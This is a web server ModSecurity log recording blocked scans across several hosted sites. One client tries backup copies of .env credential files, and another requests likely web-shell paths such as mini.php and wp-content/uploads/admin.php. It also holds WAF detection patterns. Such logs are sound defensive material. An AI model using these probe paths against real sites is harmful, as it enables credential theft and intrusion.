[Tue May 26 13:11:59.978596 2026] [security2:error] [pid 496740:tid 496902] [client 207.241.173.215:11788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.orig"] [unique_id "ahVOx-vOeft4ltnLrH41IgAAACA"]
[Tue May 26 13:11:59.979332 2026] [security2:error] [pid 496740:tid 496942] [client 207.241.173.215:11884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.backup"] [unique_id "ahVOx-vOeft4ltnLrH41HwAAAEg"]
[Tue May 26 13:11:59.996818 2026] [security2:error] [pid 496740:tid 496909] [client 207.241.173.215:11772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.swp"] [unique_id "ahVOx-vOeft4ltnLrH41JAAAACc"]
[Tue May 26 13:11:59.999953 2026] [security2:error] [pid 496740:tid 496965] [client 207.241.173.215:11870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.old"] [unique_id "ahVOx-vOeft4ltnLrH41KAAAAF8"]
[Tue May 26 13:12:00.000501 2026] [security2:error] [pid 496740:tid 496915] [client 207.241.173.215:11804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.copy"] [unique_id "ahVOx-vOeft4ltnLrH41JwAAAC0"]
[Tue May 26 13:12:00.001393 2026] [security2:error] [pid 496740:tid 496887] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.old"] [unique_id "ahVOx-vOeft4ltnLrH41KQAAABE"]
[Tue May 26 13:12:00.009909 2026] [security2:error] [pid 496740:tid 496889] [client 207.241.173.215:11446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.old"] [unique_id "ahVOyOvOeft4ltnLrH41LAAAABM"]
[Tue May 26 13:12:00.009916 2026] [security2:error] [pid 496740:tid 496931] [client 207.241.173.215:11424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.backup"] [unique_id "ahVOyOvOeft4ltnLrH41LgAAAD0"]
[Tue May 26 13:12:00.011053 2026] [security2:error] [pid 496740:tid 496898] [client 207.241.173.215:11852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.orig"] [unique_id "ahVOyOvOeft4ltnLrH41LQAAABw"]
[Tue May 26 13:12:00.022407 2026] [security2:error] [pid 496740:tid 496922] [client 207.241.173.215:11712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.backup"] [unique_id "ahVOyOvOeft4ltnLrH41MAAAADQ"]
[Tue May 26 13:12:00.023575 2026] [security2:error] [pid 496740:tid 496973] [client 207.241.173.215:11720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.swp"] [unique_id "ahVOyOvOeft4ltnLrH41MQAAAGc"]
[Tue May 26 13:12:00.072186 2026] [security2:error] [pid 496740:tid 496896] [client 207.241.173.215:11848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local~"] [unique_id "ahVOyOvOeft4ltnLrH41MgAAABo"]
[Tue May 26 13:12:00.118128 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:16147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/ftde.php"] [unique_id "ahVOyOvOeft4ltnLrH41NwAAACk"]
[Tue May 26 13:12:00.118223 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:16147] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/ftde.php"] [unique_id "ahVOyOvOeft4ltnLrH41NwAAACk"]
[Tue May 26 13:12:00.260954 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahVOyOvOeft4ltnLrH41PQAAAEE"]
[Tue May 26 13:12:00.261097 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:14334] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahVOyOvOeft4ltnLrH41PQAAAEE"]
[Tue May 26 13:12:00.298650 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46616] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hemilaminectomybaea/dfcecd1154986.shtml"] [unique_id "ahVOyOvOeft4ltnLrH41PwAAACo"]
[Tue May 26 13:12:00.298763 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46616] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hemilaminectomybaea/dfcecd1154986.shtml"] [unique_id "ahVOyOvOeft4ltnLrH41PwAAACo"]
[Tue May 26 13:12:00.406100 2026] [security2:error] [pid 496740:tid 496979] [client 20.151.117.104:40643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyOvOeft4ltnLrH41SQAAAG0"]
[Tue May 26 13:12:00.448579 2026] [security2:error] [pid 496740:tid 496755] [remote 104.23.217.19:12677] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVOx-vOeft4ltnLrH41JgAAWw4"]
[Tue May 26 13:12:00.476869 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:40643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/z.php"] [unique_id "ahVOyOvOeft4ltnLrH41SgAAADc"]
[Tue May 26 13:12:00.476952 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:40643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/z.php"] [unique_id "ahVOyOvOeft4ltnLrH41SgAAADc"]
[Tue May 26 13:12:00.625269 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:37140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/f35.php"] [unique_id "ahVOyOvOeft4ltnLrH41VAAAAAA"]
[Tue May 26 13:12:00.625398 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:37140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/f35.php"] [unique_id "ahVOyOvOeft4ltnLrH41VAAAAAA"]
[Tue May 26 13:12:00.768701 2026] [security2:error] [pid 496740:tid 496898] [client 20.151.117.104:37139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file61.php"] [unique_id "ahVOyOvOeft4ltnLrH41VQAAABw"]
[Tue May 26 13:12:00.768847 2026] [security2:error] [pid 496740:tid 496898] [client 20.151.117.104:37139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file61.php"] [unique_id "ahVOyOvOeft4ltnLrH41VQAAABw"]
[Tue May 26 13:12:00.912196 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:59290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/mah.php"] [unique_id "ahVOyOvOeft4ltnLrH41YAAAAF0"]
[Tue May 26 13:12:00.912309 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:59290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/mah.php"] [unique_id "ahVOyOvOeft4ltnLrH41YAAAAF0"]
[Tue May 26 13:12:00.979479 2026] [security2:error] [pid 496740:tid 496941] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOyOvOeft4ltnLrH41UAAAAEc"]
[Tue May 26 13:12:01.055024 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:44954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/mini.php"] [unique_id "ahVOyevOeft4ltnLrH41ZwAAADw"]
[Tue May 26 13:12:01.055161 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:44954] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/mini.php"] [unique_id "ahVOyevOeft4ltnLrH41ZwAAADw"]
[Tue May 26 13:12:01.197765 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:59290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/system_log.php"] [unique_id "ahVOyevOeft4ltnLrH41bgAAAEU"]
[Tue May 26 13:12:01.197899 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:59290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/system_log.php"] [unique_id "ahVOyevOeft4ltnLrH41bgAAAEU"]
[Tue May 26 13:12:01.341104 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:44954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/v.php"] [unique_id "ahVOyevOeft4ltnLrH41cAAAACE"]
[Tue May 26 13:12:01.341223 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:44954] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/v.php"] [unique_id "ahVOyevOeft4ltnLrH41cAAAACE"]
[Tue May 26 13:12:01.490371 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:37159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyevOeft4ltnLrH41dgAAADA"]
[Tue May 26 13:12:01.561955 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:37159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/seotheme/mar.php"] [unique_id "ahVOyevOeft4ltnLrH41gwAAACY"]
[Tue May 26 13:12:01.562064 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:37159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/seotheme/mar.php"] [unique_id "ahVOyevOeft4ltnLrH41gwAAACY"]
[Tue May 26 13:12:01.705500 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:35545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Text/index.php"] [unique_id "ahVOyevOeft4ltnLrH41iAAAAAA"]
[Tue May 26 13:12:01.705723 2026] [security2:error] [pid 496740:tid 496870] [client 20.151.117.104:35545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/Text/index.php"] [unique_id "ahVOyevOeft4ltnLrH41iAAAAAA"]
[Tue May 26 13:12:01.858174 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:54427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyevOeft4ltnLrH41jQAAAGA"]
[Tue May 26 13:12:01.932391 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-index.php"] [unique_id "ahVOyevOeft4ltnLrH41kQAAAC0"]
[Tue May 26 13:12:01.932505 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-index.php"] [unique_id "ahVOyevOeft4ltnLrH41kQAAAC0"]
[Tue May 26 13:12:02.081646 2026] [security2:error] [pid 496740:tid 496931] [client 20.151.117.104:28900] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOyuvOeft4ltnLrH41mAAAAD0"]
[Tue May 26 13:12:02.152763 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:28900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws80.php"] [unique_id "ahVOyuvOeft4ltnLrH41nwAAAEk"]
[Tue May 26 13:12:02.152892 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:28900] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws80.php"] [unique_id "ahVOyuvOeft4ltnLrH41nwAAAEk"]
[Tue May 26 13:12:02.299056 2026] [security2:error] [pid 496740:tid 496879] [client 20.151.117.104:14321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ww2.php"] [unique_id "ahVOyuvOeft4ltnLrH41pQAAAAk"]
[Tue May 26 13:12:02.299177 2026] [security2:error] [pid 496740:tid 496879] [client 20.151.117.104:14321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ww2.php"] [unique_id "ahVOyuvOeft4ltnLrH41pQAAAAk"]
[Tue May 26 13:12:02.447649 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/7logs.php"] [unique_id "ahVOyuvOeft4ltnLrH41rQAAAGo"]
[Tue May 26 13:12:02.447762 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/7logs.php"] [unique_id "ahVOyuvOeft4ltnLrH41rQAAAGo"]
[Tue May 26 13:12:02.600267 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:44981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ac.php"] [unique_id "ahVOyuvOeft4ltnLrH41tAAAAAE"]
[Tue May 26 13:12:02.600384 2026] [security2:error] [pid 496740:tid 496871] [client 20.151.117.104:44981] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ac.php"] [unique_id "ahVOyuvOeft4ltnLrH41tAAAAAE"]
[Tue May 26 13:12:02.747464 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:35571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ctex1.php"] [unique_id "ahVOyuvOeft4ltnLrH41twAAAGQ"]
[Tue May 26 13:12:02.747568 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:35571] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ctex1.php"] [unique_id "ahVOyuvOeft4ltnLrH41twAAAGQ"]
[Tue May 26 13:12:02.892821 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:39981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/defaults.php"] [unique_id "ahVOyuvOeft4ltnLrH41vgAAAAs"]
[Tue May 26 13:12:02.892922 2026] [security2:error] [pid 496740:tid 496881] [client 20.151.117.104:39981] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/defaults.php"] [unique_id "ahVOyuvOeft4ltnLrH41vgAAAAs"]
[Tue May 26 13:12:03.035185 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/domains.php"] [unique_id "ahVOy-vOeft4ltnLrH41yQAAAHc"]
[Tue May 26 13:12:03.035283 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:21655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/domains.php"] [unique_id "ahVOy-vOeft4ltnLrH41yQAAAHc"]
[Tue May 26 13:12:03.178611 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:37139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/dropdown.php"] [unique_id "ahVOy-vOeft4ltnLrH410wAAAA0"]
[Tue May 26 13:12:03.178758 2026] [security2:error] [pid 496740:tid 496883] [client 20.151.117.104:37139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/dropdown.php"] [unique_id "ahVOy-vOeft4ltnLrH410wAAAA0"]
